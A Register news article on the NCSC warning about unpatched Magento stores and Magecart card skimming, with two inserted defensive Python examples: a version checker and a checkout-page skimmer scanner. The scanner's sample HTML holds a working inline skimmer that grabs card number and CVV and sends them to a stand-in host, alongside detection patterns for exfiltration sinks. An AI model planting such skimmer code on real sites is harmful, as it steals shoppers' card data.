Ecommerce platforms (cough, Magento) need patching before Black Friday, warns UK's National Cyber Security Centre

You're your own security team, remember?


If you run a small online business powered by the Magento ecommerce platform, Britain's National Cyber Security Centre (NCSC) is begging you to make sure it's fully patched ahead of Black Friday.

"Retailers are urged to ensure that Magento – and any other software they use – is up to date," said the GCHQ offshoot in a statement today, adding it had notified 4,151 online stores that their Magento installations were vulnerable to compromise by criminals.

"The majority of the online shops used for skimming identified by the NCSC had been compromised via a known vulnerability in Magento, a popular e-commerce platform," said the cybersecurity agency.

Magento is one of the more widely used open source e-commerce platforms. Adobe bought the company in 2018 and sells a paid, hosted edition, but many SMEs stick with the free open source edition to cut costs – which also leaves them responsible for applying its security patches themselves.

Compromising Magento to steal customers' credit card details is a problem that has lingered for years – and the barrier to entry for this kind of digital crime isn't very high, as Dutch infosec firm Sansec noted last year after spotting a video offering Magento hacking tips for just $5,000.

Willem de Groot, MD of Sansec, told The Register that card-skimming is a real headache around this time of year.

"Every year," he lamented, "Sansec observes an uptick in online skimming incidents in the week before Black Friday. Since 2015, we have discovered more than 60,000 online stores with an injected payment skimmer."

He recommended double-checking that Magento installations are fully up to date (at the time of writing the latest open source release is 2.4.3-p1) and enabling multi-factor authentication on staff accounts – and also encouraged consumers to use so-called "one-time" virtual card numbers, which some banks offer.
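"Fully up to date" is easy to get wrong for Magento because its security-only releases carry a `-pN` suffix, and a generic semver comparison treats anything after a hyphen as a pre-release that sorts lower than the bare version. The following is an added example (not code from the article, Sansec or Adobe) that compares an installed version against the release the article names, handling that suffix correctly. It assumes `bin/magento --version` prints a line like `Magento CLI 2.4.3-p1` and that the Open Source metapackage in `composer.lock` is named `magento/product-community-edition`; both are assumptions, and the sample lock file contents are constructed.

```python
import json
import re
from typing import Optional, Tuple

# Latest Magento Open Source release named in the article (November 2021).
LATEST_OPEN_SOURCE = "2.4.3-p1"

# Assumed name of the Open Source metapackage in composer.lock.
OPEN_SOURCE_METAPACKAGE = "magento/product-community-edition"

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-p(\d+))?$")


def parse_magento_version(version: str) -> Tuple[int, int, int, int]:
    """Parse 'MAJOR.MINOR.PATCH[-pN]' into a comparable tuple.

    The '-pN' suffix marks a security patch release that is NEWER than the
    bare version (2.4.3-p1 > 2.4.3).  Semver libraries treat a hyphenated
    suffix as a pre-release and sort it LOWER, so they would wrongly report a
    store on 2.4.3 as current.  A missing suffix is treated as patch level 0.
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Magento version string: {version!r}")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p) if p else 0)


def is_up_to_date(installed: str, latest: str = LATEST_OPEN_SOURCE) -> bool:
    """True when the installed version is at or above the latest release."""
    return parse_magento_version(installed) >= parse_magento_version(latest)


def version_from_magento_cli_output(output: str) -> Optional[str]:
    """Pull the version out of `bin/magento --version` output (assumed format
    'Magento CLI 2.4.3-p1').  Returns None if no version is present."""
    m = re.search(r"\b(\d+\.\d+\.\d+(?:-p\d+)?)\b", output)
    return m.group(1) if m else None


def version_from_composer_lock(lock_json: str,
                               package: str = OPEN_SOURCE_METAPACKAGE) -> Optional[str]:
    """Read the pinned version of the Magento metapackage from composer.lock.
    Useful on hosts where bin/magento cannot be run (e.g. a read-only backup)."""
    lock = json.loads(lock_json)
    for pkg in lock.get("packages", []):
        if pkg.get("name") == package:
            return pkg.get("version")
    return None


# Constructed sample: a trimmed composer.lock from a store that never applied
# the -p1 security release.
SAMPLE_COMPOSER_LOCK = json.dumps({
    "packages": [
        {"name": "magento/framework", "version": "103.0.3"},
        {"name": "magento/product-community-edition", "version": "2.4.3"},
    ]
})


def audit_store(cli_output: Optional[str] = None,
                composer_lock: Optional[str] = None) -> str:
    """Report whether a store needs patching, preferring the CLI's answer and
    falling back to composer.lock."""
    installed = None
    if cli_output:
        installed = version_from_magento_cli_output(cli_output)
    if installed is None and composer_lock:
        installed = version_from_composer_lock(composer_lock)
    if installed is None:
        return "UNKNOWN: could not determine installed Magento version"
    status = "OK" if is_up_to_date(installed) else "PATCH NEEDED"
    return f"{status}: installed {installed}, latest {LATEST_OPEN_SOURCE}"


if __name__ == "__main__":
    print(audit_store(composer_lock=SAMPLE_COMPOSER_LOCK))
    print(audit_store(cli_output="Magento CLI 2.4.3-p1"))
```

The tuple comparison also orders a later minor release above any patch level of the previous one (2.4.4 beats 2.4.3-p1), so the same function keeps working once Adobe ships the next feature release.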

NCSC deputy director for economy and society Sarah Lyons said in a canned statement: "We want small and medium-sized online retailers to know how to prevent their sites being exploited by opportunistic cyber criminals over the peak shopping period."

Generic IT advice, including stuff aimed at non-techies, is available on the NCSC website.

Attacks on Magento installations are so popular in the criminal underworld that they spawned an entire industry of card thieves loosely known as Magecart – an umbrella label for many distinct crews rather than a single gang. Magecart groups mostly target ecommerce platforms, and no longer limit themselves to the Adobe-owned software that proved so lucrative for them.

Infosec firm RiskIQ, one of many vendors tracking Magecart's various Hydra-like incarnations, noted in 2019: "Web skimming goes well beyond Magento. Skimming groups target almost any web environment, including dozens of other online shopping platforms used by stores around the world."
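Whatever the platform, a web skimmer ends up as JavaScript on the checkout page that reads the card fields and sends them somewhere the shop did not intend. The following is an added example (not code from the article, RiskIQ or Sansec) of a first-pass check a shop owner can run against their own checkout HTML: it lists every script, flags external scripts from hosts outside an allowlist, and flags inline scripts that both touch card fields and have an outbound channel or show signs of obfuscation. The allowlist hosts, field names and the sample page are all constructed for the example; a legitimate payment integration can trip the inline heuristics too, so treat the output as a list of scripts to review, not a verdict.

```python
import re
from html.parser import HTMLParser
from typing import List, NamedTuple, Optional, Set
from urllib.parse import urlparse

# Hosts this shop legitimately loads scripts from (illustrative assumption).
ALLOWED_SCRIPT_HOSTS: Set[str] = {"shop.example", "static.shop.example", "psp.example"}

# Card-field names as they commonly appear in checkout markup (assumed).
CARD_FIELD_RE = re.compile(r"cc_number|cc_cid|cc_exp|card[_-]?number|cvv|cvc|expir", re.I)
# Ways a script can push data off the page.
EXFIL_RE = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=|WebSocket\(", re.I)
# Common skimmer obfuscation primitives.
OBFUSCATION_RE = re.compile(r"atob\(|fromCharCode|eval\(|unescape\(", re.I)


class Script(NamedTuple):
    src: Optional[str]   # value of the src attribute, None for inline scripts
    body: str            # inline contents (empty for external scripts)


class ScriptCollector(HTMLParser):
    """Collect every <script> element, external or inline."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Script] = []
        self._in_script = False
        self._src: Optional[str] = None
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append(Script(self._src, "".join(self._buf)))
            self._in_script = False


def find_suspicious_scripts(html: str,
                            allowed_hosts: Set[str] = ALLOWED_SCRIPT_HOSTS) -> List[str]:
    """Return one finding per script that warrants a human look."""
    collector = ScriptCollector()
    collector.feed(html)
    findings: List[str] = []
    for s in collector.scripts:
        if s.src is not None:
            parsed = urlparse(s.src.strip())
            if parsed.scheme in ("data", "javascript"):
                findings.append(f"external script with {parsed.scheme}: URI: {s.src[:60]!r}")
            # urlparse resolves protocol-relative '//host/x.js' to a hostname too;
            # a relative path has no hostname and is treated as same-origin.
            elif parsed.hostname and parsed.hostname not in allowed_hosts:
                findings.append(f"external script from unlisted host: {s.src}")
            continue
        body = s.body
        snippet = body.strip()[:60]
        if CARD_FIELD_RE.search(body) and EXFIL_RE.search(body):
            findings.append(f"inline script reads card fields and has a network sink: {snippet!r}")
        elif OBFUSCATION_RE.search(body) and EXFIL_RE.search(body):
            findings.append(f"inline script is obfuscated and has a network sink: {snippet!r}")
    return findings


# Constructed sample checkout page: one allowed script, one injected external
# script, one inline skimmer, and one harmless inline config block.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="https://static.shop.example/js/checkout.js"></script>
<script src="//cdn-stats.example/analytics.js"></script>
<script>
  document.getElementById('cc_number').addEventListener('change', function (e) {
    var payload = btoa(e.target.value + '|' + document.getElementById('cc_cid').value);
    new Image().src = 'https://collect.example/p?d=' + payload;
  });
</script>
<script>window.checkoutConfig = {"quoteId": "1"};</script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for finding in find_suspicious_scripts(SAMPLE_CHECKOUT_HTML):
        print(finding)
```

Run this against a saved copy of the live checkout page (fetched as a customer would see it, since some skimmers only inject on the payment step) and diff the findings against a known-good baseline; a new unlisted host or a new inline script touching card fields is exactly the change the article's victims did not notice.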

Magecart groups were behind the infamous compromises of British Airways and Ticketmaster, both disclosed in 2018.

There's one more thing that everyone can do to protect themselves against card fraud during this weekend's US-inspired Black Friday/Cyber Monday shopping frenzy.

"Monitor your card statements, especially in the holiday season," warned Sansec's de Groot. ®

Biting the hand that feeds IT © 1998–2021